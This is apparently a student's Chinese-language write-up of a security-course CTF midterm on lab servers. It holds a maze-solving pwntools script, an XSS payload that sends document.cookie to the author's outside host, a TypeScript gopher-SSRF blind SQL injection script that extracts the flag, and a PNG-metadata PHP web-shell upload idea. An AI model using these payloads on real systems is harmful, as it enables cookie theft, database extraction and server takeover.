Home

SCIST mid writeup

#SCIST#nckuctf#writeup

Eason

資安課程期中writeup

Maze 3D

題目

有一個(x,y,z)的迷宮,要從(1,1,1)走到(12,12,12)。

題解

懶著寫什麽DFS,用手玩:

from enum import Enum
from pwn import *

r=remote("lab.scist.org", 10309);

r.readuntil("> Command: ");

r.sendline("start");

r.readuntil("> Downward");

nlx=1
nly=1
nlz=1

def walk(nldir: str)->bool:
    global nlx,nly,nlz
    r.readuntil("> Controller input: ")
    r.sendline(nldir)
    res=r.readuntil(".").decode()
    if not ("success" in res):
        return False;
    if nldir=="Left":
        nlx-=1
    if nldir=="Right":
        nlx+=1
    if nldir=="Forward":
        nly+=1
    if nldir=="Backward":
        nly-=1
    if nldir=="Upward":
        nlz+=1
    if nldir=="Downward":
        nlz-=1
    return True
while True:
    raw:str=input("Which Direction?");
    nldir="Downward"
    if "x-" in raw:
        nldir="Left"
    if "x+" in raw:
        nldir="Right"
    if "y+" in raw:
        nldir="Forward"
    if "y-" in raw:
        nldir="Backward"
    if "z+" in raw:
        nldir="Upward"
    print("success" if walk(nldir) else "fail")
    print("(",nlx,", ",nly,", ",nlz,")")
    if nlx==12 and nly==12 and nlz==12:
        break;
        
r.interactive()

xsser

題目

一個文字分享平台,後端會用selenium看你的post。

題解

輸入一下文字:

<img src='
'onerror='/*
*/fetch(`https://ctf.easonabc.eu.org/${document.cookie}`)'&gt;a

requestor

題目

curl requester+可以sql injection的endpoint(remote socket address須為127.0.0.1)

題解

使用gopher

  1. 做一個POST request
  2. 換成\r\n,並URIencode
  3. 加上gopher://127.0.0.1:5000,並URIencode
  4. 將上http://lab.scist.org:20002/,傳出去

SQL injection

半個爆破

他的'可以簡單跳脫,然後去找一個套件幫你跳脫特殊字元,用LIKE 'prefix%'找密碼

遇到的坑

做一開始我用escapeSql跳脫特殊字元,但它好像不會正確跳脫?,所以我只好用' OR hex(password) LIKE '${convertToHex(prefix)}%

程式

const DICT = "~!@#$%^&*()_+{}|:\"?><`-=[]\\;,./'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

class InjectRequest {
  payload: string;
  constructor(inject: string) {
    const stage1 = encodeURI(inject);
    const stage2 = `POST http://localhost:5000/admin HTTP/1.1
host: localhost:5000
Connection: close
Content-Length: ${`username=admin&password=${stage1}`.length}
Origin: https://localhost:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

username=admin&password=${stage1}`;
    this.payload = encodeURI(
      ("http://lab.scist.org:20002/@gopher://127.0.0.1:5000/_" + stage2)
        .replace("%0A", "%0D%0A"),
    );
  }
  async send(): Promise<string> {
    this.payload = encodeURI(this.payload);
    const res = await fetch(this.payload);
    const result = await res.text();
    return result;
  }
  static async start_with(prefix: string): Promise<string> {
    const req = new InjectRequest(`' OR hex(password) LIKE '${convertToHex(prefix)}%`);
    return await req.send();
  }
}

function convertToHex(str:string):string {
    let hex = '';
    for(let i=0;i<str.length;i++) {
        hex += ''+str.charCodeAt(i).toString(16);
    }
    return hex;
}

let prefix = "SCIST{";

async function main() {
  outer:while (!prefix.endsWith("}")) {
    for (let i = 0; i < DICT.length; i++) {
      const item = DICT[i];
      let res = await InjectRequest.start_with(prefix + item);
      if (res.endsWith("admin")) {
        prefix += item;
        break;
      }
      if ((i + 1) == DICT.length) {
        console.warn("no vaild candiates");
        break outer;
      }
    }
  }
  console.log(`FLAG: ${prefix}`);
}

main();

uploader

我沒有成功

題目

有一個可以傳png的網站,傳的圖片不能太小,如果傳的圖片大小足夠,會Timeout,我去開ticket被關掉了,不知道是不是預期行為?

我的想法

使用 Gnome view之類的圖片預覽軟體,點開metadata,在任意欄位加入文字<?php system('curl https://url/to/your_shell.php -o somewhere'),改檔名,傳出去

有點像是這樣

POST http://lab.scist.org:20000/ HTTP/1.1
host: lab.scist.org:20000
Connection: keep-alive
Content-Length: 539
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://lab.scist.org:20000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWYka0TB7biLOEKCR
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://lab.scist.org:20000/
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b7d9a1fe7d0cc684bd61de13de47aded

------WebKitFormBoundaryWYka0TB7biLOEKCR
Content-Disposition: form-data; name="file"; filename="output.php"
Content-Type: image/png

‰PNG

然後你就獲得一個php shell了